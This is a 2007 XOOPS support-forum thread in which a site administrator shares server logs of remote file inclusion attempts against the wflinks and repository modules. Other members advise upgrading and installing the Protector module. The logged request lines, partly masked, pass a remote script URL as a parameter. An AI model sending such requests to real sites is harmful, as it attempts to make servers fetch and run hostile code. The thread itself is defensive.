1
peterr
Is 2.2.3 final 'hacker proof' ?
  • 2007/4/7 5:37

  • peterr

  • Just can't stay away

  • Posts: 518

  • Since: 2004/8/5 9


Had the following attempts in the last few days ...

=========================================================

Thu Apr 5 2007 1:44:57 pm CDT

87.24.194.59 tried to load
.example.com/modules/wflinks/viewcat.php?cid=http://www.??kola.ch/???irot_r0x/???.txt?

User Agent = libwww-perl/5.805

===========================================================

Thu Apr 5 2007 1:46:11 pm CDT

87.24.194.59 tried to load
.example.com/modules/repository/singlefile.php?cid=http://www.??kola.ch/???irot_r0x/???.txt?

User Agent = libwww-perl/5.805

============================================================

Thu Apr 5 2007 8:26:41 pm CDT

83.15.139.164 tried to load
.example.com//modules/wflinks/viewcat.php?cid=http://????channel.narod.ru/????.txt??

User Agent = libwww-perl/5.64

=============================================================

Thu Apr 5 2007 6:57:15 pm CDT

87.24.194.59 tried to load
.example.com/modules/repository/singlefile.php?1.03=http://www.???ola.ch/???irot_r0x/???.txt?

User Agent = libwww-perl/5.805

==============================================================

Thu Apr 5 2007 6:34:45 pm CDT

87.24.194.59 tried to load
.example.net/modules/repository/singlefile.php?1.03=http://www.???ola.ch/???irot_r0x/???.txt?

User Agent = libwww-perl/5.805

===============================================================

Thu Apr 5 2007 2:01:07 pm CDT

87.24.194.59 tried to load
.example.net/modules/repository/singlefile.php?cid=http://www.???ola.ch/???irot_r0x/???.txt?

User Agent = libwww-perl/5.805

=================================================================

Thu Apr 5 2007 1:48:22 pm CDT

87.24.194.59 tried to load
.example.com/modules/repository/singlefile.php?1.03=http://www.???ola.ch/???irot_r0x/???.txt?

User Agent = libwww-perl/5.805

==================================================================

87.24.194.59 has a canonical name of host59-194-static.24-87-b.business.telecomitalia.it.

83.15.139.164 has a canonical name of elf164.internetdsl.tpnet.pl.

The website is version 2.2.3 final. is that version 'safe' ??

[EDITED by m0nty to remove possibility for users copy/pasting url]
NO to the Microsoft Office format as an ISO standard.
Sign the petition

2
xguide
Re: Is 2.2.3 final hacker proof ?
  • 2007/4/7 6:16

  • xguide

  • Just popping in

  • Posts: 43

  • Since: 2005/5/11


No it is not secure. And you can read it is not recommended by XOOPS project team.

Good Luck.

3
peterr
Re: Is 2.2.3 final hacker proof ?
  • 2007/4/7 6:27

  • peterr

  • Just can't stay away

  • Posts: 518

  • Since: 2004/8/5 9


Okay thanks. I will take that site 'off air' for a while, and probably re-install with 2.0.16

There is another site, I think it is 2.0.15, the 'version' info is ..

$modversion['name'] = _MI_SYSTEM_NAME;
$modversion['version'] = 1.01;
$modversion['description'] = _MI_SYSTEM_DESC;
$modversion['author'] = "";
$modversion['credits'] = "The XOOPS Project";
$modversion['help'] = "system.html";
$modversion['license'] = "GPL see LICENSE";
$modversion['official'] = 1;
$modversion['image'] = "images/system_slogo.png";
$modversion['dirname'] = "system";


I should update that to 2.0.16 as well though, even though it is 'safer' than 2.2.3 final.

Thanks for your help. :)
NO to the Microsoft Office format as an ISO standard.
Sign the petition

4
xguide
Re: Is 2.2.3 final hacker proof ?
  • 2007/4/7 6:33

  • xguide

  • Just popping in

  • Posts: 43

  • Since: 2005/5/11


I can not give support if you install any xoops.org version just advise you to visit Mr. Gijoe site to get the module protector and learn to protect your site.

http://xoops.peak.ne.jp/

Good Luck.

5
vaughan
Re: Is 2.2.3 final hacker proof ?
  • 2007/4/7 9:16

  • vaughan

  • Friend of XOOPS

  • Posts: 680

  • Since: 2005/11/26


@peterr

2.2.5 rc1 is better than 2.2.3.

2.0.16 is the recommended way to go though.

the only good advice xguide gave you here is to make sure you have protector module installed.

but on that note, just because you have it, doesn't make your site hacker proof. Nothing in computer world is 100% hack proof. nothing whatsoever, and anyone who tells you different is misinformed. all you can do is make it harder for them.

6
davidl2
Re: Is 2.2.3 final hacker proof ?
  • 2007/4/7 9:50

  • davidl2

  • XOOPS is my life!

  • Posts: 4843

  • Since: 2003/5/26


If you have already got a site established using 2.2.3 - then move to 2.2.5rc2

If, however, it's a new site.. then as Xguide says - it's not a recommended release so starting from fresh with 2.0.16 would be a much better idea.

As both the other posters have stressed - we definately recommend "Protector" ... it's an excellent module indeed. But also see the article on security at http://www.xoopsinfo.com for more advise.

7
McDonald
Re: Is 2.2.3 final 'hacker proof' ?
  • 2007/4/7 9:51

  • McDonald

  • Home away from home

  • Posts: 1072

  • Since: 2005/8/15


@peterr

You also might want to update your WF-Links module.
Last week WF-Links was updated because of a security hole.
You can download it here.

8
davidl2
Re: Is 2.2.3 final hacker proof ?
  • 2007/4/7 10:06

  • davidl2

  • XOOPS is my life!

  • Posts: 4843

  • Since: 2003/5/26


Thanks for the fast work with this update McDonald.

Incidently - it looks like Mambo had a similar hack here as well - so this issue isn't just specific to XOOPS modules.

9
peterr
Re: Is 2.2.3 final hacker proof ?
  • 2007/4/7 11:21

  • peterr

  • Just can't stay away

  • Posts: 518

  • Since: 2004/8/5 9


Quote:

vaughan wrote:
2.2.5 rc1 is better than 2.2.3.

2.0.16 is the recommended way to go though.


I think I will do a full back of the site with 2.2.3 final, and do a fresh install 2.0.16

There really isn't much content on it, and the wf-links data can easily be reloaded. Then I'll add the protector module.

Yes, nothing is 100% certain.

Thanks. :)
NO to the Microsoft Office format as an ISO standard.
Sign the petition

10
peterr
Re: Is 2.2.3 final hacker proof ?
  • 2007/4/7 11:24

  • peterr

  • Just can't stay away

  • Posts: 518

  • Since: 2004/8/5 9


Quote:

davidl2 wrote:
As both the other posters have stressed - we definately recommend "Protector" ... it's an excellent module indeed. But also see the article on security at http://www.xoopsinfo.com for more advise.


Thanks for the advice on the protector module. The site http://xoopsinfo.com is interesting, I will check that out some more.
NO to the Microsoft Office format as an ISO standard.
Sign the petition

Login

Who's Online

228 user(s) are online (156 user(s) are browsing Support Forums)


Members: 0


Guests: 228


more...

Donat-O-Meter

Stats
Goal: $100.00
Due Date: Nov 30
Gross Amount: $0.00
Net Balance: $0.00
Left to go: $100.00
Make donations with PayPal!

Latest GitHub Commits